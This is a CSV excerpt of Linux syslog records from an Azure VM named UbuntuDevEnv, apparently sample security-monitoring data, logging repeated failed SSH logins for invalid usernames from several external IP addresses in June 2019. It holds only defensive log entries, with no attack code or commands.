+17565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:05,UbuntuDevEnv,2019-06-26 09:13:04,auth,UbuntuDevEnv,info,Disconnected from invalid user vn 176.31.202.90 port 48254 [preauth],67114,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.202.9,48254,,
+17566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:17,UbuntuDevEnv,2019-06-26 09:13:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:17,UbuntuDevEnv,2019-06-26 09:13:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:17,UbuntuDevEnv,2019-06-26 09:13:16,auth,UbuntuDevEnv,info,Invalid user prestashop from 187.6.249.142 port 60182,67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,187.6.249.1,60182,,
+17569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:19,UbuntuDevEnv,2019-06-26 09:13:18,auth,UbuntuDevEnv,info,Failed password for invalid user prestashop from 187.6.249.142 port 60182 ssh2,67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,187.6.249.1,60182,,
+17570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:19,UbuntuDevEnv,2019-06-26 09:13:19,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 60182:11: Bye Bye [preauth],67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,60182,,
+17571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:13:19,UbuntuDevEnv,2019-06-26 09:13:19,auth,UbuntuDevEnv,info,Disconnected from invalid user prestashop 187.6.249.142 port 60182 [preauth],67168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,187.6.249.1,60182,,
+17572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:02,UbuntuDevEnv,2019-06-26 09:14:02,auth,UbuntuDevEnv,info,Invalid user xiu from 176.31.43.255 port 55924,67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.43.2,55924,,
+17573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:02,UbuntuDevEnv,2019-06-26 09:14:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:02,UbuntuDevEnv,2019-06-26 09:14:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:04,UbuntuDevEnv,2019-06-26 09:14:04,auth,UbuntuDevEnv,info,Failed password for invalid user xiu from 176.31.43.255 port 55924 ssh2,67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.43.2,55924,,
+17576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:04,UbuntuDevEnv,2019-06-26 09:14:04,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 55924:11: Bye Bye [preauth],67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,55924,,
+17577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:04,UbuntuDevEnv,2019-06-26 09:14:04,auth,UbuntuDevEnv,info,Disconnected from invalid user xiu 176.31.43.255 port 55924 [preauth],67328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,176.31.43.2,55924,,
+17578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:17,UbuntuDevEnv,2019-06-26 09:14:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:17,UbuntuDevEnv,2019-06-26 09:14:17,auth,UbuntuDevEnv,info,Invalid user default from 115.159.216.187 port 41059,67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,115.159.216.1,41059,,
+17580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:17,UbuntuDevEnv,2019-06-26 09:14:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+17581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:18,UbuntuDevEnv,2019-06-26 09:14:18,auth,UbuntuDevEnv,info,Invalid user q3server from 165.22.203.187 port 38244,67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,165.22.203.1,38244,,
+17582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:18,UbuntuDevEnv,2019-06-26 09:14:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:18,UbuntuDevEnv,2019-06-26 09:14:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:19,auth,UbuntuDevEnv,info,Failed password for invalid user q3server from 165.22.203.187 port 38244 ssh2,67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,165.22.203.1,38244,,
+17585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:19,auth,UbuntuDevEnv,info,Failed password for invalid user default from 115.159.216.187 port 41059 ssh2,67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,115.159.216.1,41059,,
+17586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:19,auth,UbuntuDevEnv,info,Disconnected from invalid user q3server 165.22.203.187 port 38244 [preauth],67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,165.22.203.1,38244,,
+17587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:19,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 38244:11: Bye Bye [preauth],67394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,38244,,
+17588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:20,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 41059:11: Bye Bye [preauth],67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,41059,,
+17589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:20,UbuntuDevEnv,2019-06-26 09:14:20,auth,UbuntuDevEnv,info,Disconnected from invalid user default 115.159.216.187 port 41059 [preauth],67375,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,115.159.216.1,41059,,
+17590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:27,UbuntuDevEnv,2019-06-26 09:14:26,auth,UbuntuDevEnv,info,Invalid user pedro from 176.31.202.90 port 36826,67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.202.9,36826,,
+17591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:27,UbuntuDevEnv,2019-06-26 09:14:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:27,UbuntuDevEnv,2019-06-26 09:14:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:28,UbuntuDevEnv,2019-06-26 09:14:28,auth,UbuntuDevEnv,info,Failed password for invalid user pedro from 176.31.202.90 port 36826 ssh2,67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.202.9,36826,,
+17594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:28,UbuntuDevEnv,2019-06-26 09:14:28,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 36826:11: Bye Bye [preauth],67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,36826,,
+17595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:14:28,UbuntuDevEnv,2019-06-26 09:14:28,auth,UbuntuDevEnv,info,Disconnected from invalid user pedro 176.31.202.90 port 36826 [preauth],67426,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pedro,176.31.202.9,36826,,
+17596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:07,UbuntuDevEnv,2019-06-26 09:15:07,auth,UbuntuDevEnv,info,Invalid user jesse from 187.6.249.142 port 49064,67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesse,187.6.249.1,49064,,
+17597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:07,UbuntuDevEnv,2019-06-26 09:15:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:07,UbuntuDevEnv,2019-06-26 09:15:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:09,UbuntuDevEnv,2019-06-26 09:15:09,auth,UbuntuDevEnv,info,Failed password for invalid user jesse from 187.6.249.142 port 49064 ssh2,67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesse,187.6.249.1,49064,,
+17600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:09,UbuntuDevEnv,2019-06-26 09:15:09,auth,UbuntuDevEnv,info,Disconnected from invalid user jesse 187.6.249.142 port 49064 [preauth],67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jesse,187.6.249.1,49064,,
+17601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:09,UbuntuDevEnv,2019-06-26 09:15:09,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 49064:11: Bye Bye [preauth],67596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,49064,,
+17602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:25,UbuntuDevEnv,2019-06-26 09:15:25,auth,UbuntuDevEnv,info,Invalid user admin from 176.31.43.255 port 35652,67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,35652,,
+17603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:25,UbuntuDevEnv,2019-06-26 09:15:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:25,UbuntuDevEnv,2019-06-26 09:15:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:27,UbuntuDevEnv,2019-06-26 09:15:26,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 176.31.43.255 port 35652 ssh2,67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,35652,,
+17606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:27,UbuntuDevEnv,2019-06-26 09:15:26,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 35652:11: Bye Bye [preauth],67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,35652,,
+17607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:27,UbuntuDevEnv,2019-06-26 09:15:26,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 176.31.43.255 port 35652 [preauth],67668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.43.2,35652,,
+17608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:43,UbuntuDevEnv,2019-06-26 09:15:42,auth,UbuntuDevEnv,info,Invalid user wei from 165.22.203.187 port 60118,67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,165.22.203.1,60118,,
+17609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:43,UbuntuDevEnv,2019-06-26 09:15:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:43,UbuntuDevEnv,2019-06-26 09:15:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:43,UbuntuDevEnv,2019-06-26 09:15:43,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 24421 [preauth],67514,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,24421,,
+17612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:45,UbuntuDevEnv,2019-06-26 09:15:44,auth,UbuntuDevEnv,info,Failed password for invalid user wei from 165.22.203.187 port 60118 ssh2,67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,165.22.203.1,60118,,
+17613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:45,UbuntuDevEnv,2019-06-26 09:15:44,auth,UbuntuDevEnv,info,Disconnected from invalid user wei 165.22.203.187 port 60118 [preauth],67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wei,165.22.203.1,60118,,
+17614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:45,UbuntuDevEnv,2019-06-26 09:15:44,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 60118:11: Bye Bye [preauth],67791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,60118,,
+17615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:52,UbuntuDevEnv,2019-06-26 09:15:52,auth,UbuntuDevEnv,info,Invalid user q3server from 176.31.202.90 port 53628,67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.202.9,53628,,
+17616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:52,UbuntuDevEnv,2019-06-26 09:15:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:52,UbuntuDevEnv,2019-06-26 09:15:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:54,UbuntuDevEnv,2019-06-26 09:15:53,auth,UbuntuDevEnv,info,Failed password for invalid user q3server from 176.31.202.90 port 53628 ssh2,67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.202.9,53628,,
+17619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:54,UbuntuDevEnv,2019-06-26 09:15:54,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 53628:11: Bye Bye [preauth],67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,53628,,
+17620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:15:54,UbuntuDevEnv,2019-06-26 09:15:54,auth,UbuntuDevEnv,info,Disconnected from invalid user q3server 176.31.202.90 port 53628 [preauth],67824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,q3server,176.31.202.9,53628,,
+17621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:47,UbuntuDevEnv,2019-06-26 09:16:47,auth,UbuntuDevEnv,info,Invalid user ir from 176.31.43.255 port 43606,68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.43.2,43606,,
+17622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:47,UbuntuDevEnv,2019-06-26 09:16:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:47,UbuntuDevEnv,2019-06-26 09:16:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:50,UbuntuDevEnv,2019-06-26 09:16:49,auth,UbuntuDevEnv,info,Failed password for invalid user ir from 176.31.43.255 port 43606 ssh2,68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.43.2,43606,,
